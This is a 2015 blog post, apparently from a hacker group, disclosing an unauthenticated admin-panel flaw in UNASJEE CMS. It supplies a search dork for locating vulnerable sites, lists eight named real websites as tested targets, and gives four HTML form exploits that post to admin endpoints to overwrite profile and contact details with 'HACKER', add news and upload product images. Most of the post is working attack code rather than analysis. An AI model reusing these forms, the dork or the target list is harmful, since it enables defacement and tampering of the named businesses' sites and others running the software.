22 Mart 2015 Pazar

UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits

UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
############################################################
Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu  http://milw00rm.com / http://fiXen.org
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : UNASJEE CMS
|~Affected Version : All Version
|~Vendor :  http://www.unasjee.net/
|~DORK : intext:Designed & Developed by: UNASJEE
|~RISK : High
|~Date: 22.03.2015
|~Tested On : [L] Kali Linux
####################INFO################################
admin panel without login It is possible to post data
the server will accept absolute.
########################################################
Demo and Tested on;
http://turnnersports.com
http://www.badhawaind.com
http://www.cliftonintl.com
http://www.aqnaf.com
http://shanisports.com
http://tayyabgarments.com
http://www.shreentrader.com
http://www.moosaleathers.com
----------------------------------------------------------
----------------------------------------------------------
                 Change Profile Detai PoC
----------------------------------------------------------

  <!-- Change Profile Detail -->
  <body>
    <form action="http://[TARGET]/admincp/updprofile.php" method="POST">
      <input type="hidden" name="pfid" value="1" />
      <input type="hidden" name="sFullDescription" value="HACKERRRRRRR" />
      <input type="hidden" name="p1" value="HACKERRRRRRR" />
      <input type="hidden" name="Submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

----------------------------------------------------------
                Add News PoC     
----------------------------------------------------------

                               <form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();">
                                  <tr>
                                    <td valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;Title:
                                      </strong><span class="error">*</span> </td>
                                    <td valign="top" bgcolor="E8EEF3"> <input name="ntitle" type="text" class="txtdefault" id="ntitle">
                                    </td>
                                  </tr>
                                  <tr>
                                    <td valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;Date:&nbsp;</strong><span class="error">*</span></td>
                                    <td valign="top" bgcolor="E8EEF3"> <input name="nDate" type="text" class="txtdefault" id="nDate">
                                      &nbsp;(YYYY-MM-DD)</td>
                                  </tr>
                                  <tr>
                                    <td width="25%" valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;News:<span class="error">&nbsp;</span></strong><span class="error">*</span></td>
                                    <td width="75%" valign="top" bgcolor="E8EEF3">
                                      <textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td>
                                  </tr>
                                  <tr>
                                    <td bgcolor="E8EEF3">&nbsp;</td>
                                    <td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td>
                                  </tr>
                                </form>
                              </table></td>
                          </tr>
                        </table></td>
                    </tr>
                    <tr>
                      <td align="center"><img src="imgs/spacer.GIF" width="1" height="30"></td>
                    </tr>
                                      </table></td>
              </tr>
            </table></td>
        </tr>
        <tr>

----------------------------------------------------------
            Add Products PoC          
----------------------------------------------------------


                            <td valign="top"><table width="450" border="0" cellpadding="1" cellspacing="2">
                                <form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();">
                                  <tr>
                                    <td width="29%" valign="top" bgcolor="E8EEF3">&nbsp;&nbsp;<strong>Name:</strong></td>
                                    <td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName">
                                      &nbsp;<font color="#FF0000">*</font></td>
                                  </tr>
                                  <tr>
                                    <td bgcolor="E8EEF3">&nbsp;&nbsp;<strong>Show:</strong></td>
                                    <td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                                        <tr>
                                          <td width="6%"><input name="show" type="radio" value="y" checked></td>
                                          <td width="13%">Yes</td>
                                          <td width="5%"><input type="radio" name="show" value="n"></td>
                                          <td width="76%">No</td>
                                        </tr>
                                      </table></td>
                                  </tr>
                                  <tr>
                                    <td bgcolor="E8EEF3">&nbsp;<strong>&nbsp;Category
                                      Image:</strong></td>
                                    <td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile">
                                      &nbsp;70 x 62 px</td>
                                  </tr>
                                  <tr>
                                    <td bgcolor="E8EEF3">&nbsp;</td>
                                    <td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td>
                                  </tr>
                                </form>
                              </table></td>
                          </tr>
                        </table></td>
                    </tr>
                    <tr>

----------------------------------------------------------
               Change Contact Details  PoC
----------------------------------------------------------

                  <form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php" >
                             <input type="hidden" name="cid" value="1"> 
                          <table align=center width=525>
                            <tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white">
                              <td height="25" colspan=3><div align="center">Change
                                  your Contact Detail:</div></td>
                          </tr>
                          <tr>
                              <td width="35%">&nbsp;</td>
                              <td width="75%">&nbsp;</td>
                              <td>&nbsp;</td>
                          </tr>
                            <tr>
                              <td width="35%" height="25" bgcolor="#CCCCCC"> &nbsp;First
                                Contact Person:</td>
                              <td width="75%">&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Contact Person:</td>
                              <td width="75%">
                                <input name=cp1 type=text id="cp1" value="HACKER"></td>
                            <td width="16">&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Designation:</td>
                              <td width="75%">
<input name=cpd1 type=text id="cpd1" value="HACKER"></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Mobile:</td>
                              <td width="75%">
<input name=cpm1 type=text id="cpm1" value="HACKER"></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%" height="25" bgcolor="#CCCCCC"> &nbsp;Second
                                Contact Person:</td>
                              <td width="75%">&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Contact Person:</td>
                              <td width="75%">
<input name=cp2 type=text id="cp2" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Designation:</td>
                              <td width="75%">
<input name=cpd2 type=text id="cpd2" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Mobile:</td>
                              <td width="75%">
<input name=cpm2 type=text id="cpm2" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%" height="25" bgcolor="#CCCCCC">&nbsp;Third
                                Contact Person:</td>
                              <td width="75%">&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Contact Person:</td>
                              <td width="75%">
<input name=cp3 type=text id="cp3" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Designation:</td>
                              <td width="75%">
<input name=cpd3 type=text id="cpd3" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Mobile:</td>
                              <td width="75%">
<input name=cpm3 type=text id="cpm3" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">&nbsp;</td>
                              <td width="75%">&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Phone I:</td>
                              <td width="75%">
<input name=ph1 type=text id="ph1" value="HACKER"></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Phone II:</td>
                              <td width="75%">
<input name=ph2 type=text id="ph2" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Phone III:</td>
                              <td width="75%">
<input name=ph3 type=text id="ph3" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">&nbsp;</td>
                              <td width="75%">&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Fax I:</td>
                              <td width="75%">
<input name=fax1 type=text id="fax1" value="HACKER"></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">&nbsp;</td>
                              <td width="75%">&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">E - Mail I:</td>
                              <td width="75%">
<input name=email1 type=text id="email1" value="HACKER"></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">E - Mail II:</td>
                              <td width="75%">
<input name=email2 type=text id="email2" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">E - Mail II:</td>
                              <td width="75%">
<input name=email3 type=text id="email3" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">&nbsp;</td>
                              <td width="75%">&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">Web Site:</td>
                              <td width="75%">
<input name=web type=text id="web" value="HACKER"></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                            <td>&nbsp;</td>
                            <td>&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                            <td>Skype:</td>
                            <td><input name=skype type=text id="skype" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                            <td>Yahoo:</td>
                            <td><input name=yahoo type=text id="yahoo" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                            <td>gTalk:</td>
                            <td><input name=gtalk type=text id="gtalk" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                            <td>MSN:</td>
                            <td><input name=msn type=text id="msn" value=""></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                            <td>&nbsp;</td>
                            <td>&nbsp;</td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%"><div><strong>Asia Head Office&nbsp;Address:</strong></div>
                                <br></td>
                              <td width="75%">
<textarea name=haddress cols=38 rows=4 id="haddress" >HACKER</textarea></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%"><strong>Hong Kong  Office&nbsp;Address:</strong> </td>
                              <td width="75%">
<textarea name=faddress cols=38 rows=4 id="faddress" ></textarea></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                            <td><strong>Australian&nbsp;Office&nbsp;Address:</strong></td>
                            <td><textarea name=fax2 cols=38 rows=4 id="fax2" ></textarea></td>
                            <td>&nbsp;</td>
                          </tr>
                          <tr>
                              <td width="35%">&nbsp;</td>
                              <td width="75%">
<input type="submit" name="Submit" value="Submit">
                                <input name="reset" type="reset" id="reset" value="Reset"></td>
                            <td>&nbsp;</td>
                          </tr>
                        </table>
               
                        </form>
                     

Hiç yorum yok:

Yorum Gönder